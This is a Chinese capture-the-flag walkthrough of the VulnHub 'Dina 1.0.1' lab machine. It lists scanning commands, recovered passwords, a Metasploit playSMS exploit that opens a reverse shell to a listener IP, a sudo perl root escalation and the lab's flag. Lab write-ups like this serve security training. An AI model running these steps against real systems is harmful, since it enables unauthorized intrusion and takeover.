Dina: 1.0.1靶机

靶机地址:Dina: 1.0.1 ~ VulnHub

查看靶机的MAC地址:

一、信息收集

扫描目标主机

arp-scan -l

使用扫描nmap扫描目标靶机开放的端口

nmap -sV -p- 192.168.7.85

浏览器访问80端口

使用dirsearch扫描目录

dirsearch -u http://192.168.7.85/

拼接/robots.txt

拼接/nothing,查看页面源代码,发现了一些密码信息

freedom
password
helloworld!
diana
iloveroot

拼接/secure/,出现一个压缩包文件,点击,将其下载到本地查看

解压时发现需要输入密码,尝试用上面得到的密码解压backup.zip文件,发现freedom可以

解压之后发现是一个mp3文件,播放时发现已损坏,右键将其用记事本打开,发现了一个用户名:touhid和url:/SecreTSMSgatwayLogin

拼接发现的url:/SecreTSMSgatwayLogin,发现了一个登录框

使用用户名:touhid和上方得到的密码信息分别尝试登录(!!!火狐登不上试试其他浏览器)

经测试,账户:touhid,密码:diana

二、Getshell

利用msf工具搜索相关框架漏洞

msfconsole
search playSMS
use exploit/multi/http/playsms_filename_exec   
show options
set rhosts 192.168.7.85     #靶机IP
set targeturi /SecreTSMSgatwayLogin
set username touhid
set password diana
set lhost 192.168.7.251     #监听机IP
run

三、权限提升

切换交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

sudo提权

sudo -l      #查看可执行的命令

在线网站:GTFOBins

sudo perl -e 'exec "/bin/sh";'

提权成功!

成功得到flag{22d06624cd604a0626eb5a2992a6f2e6}

  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值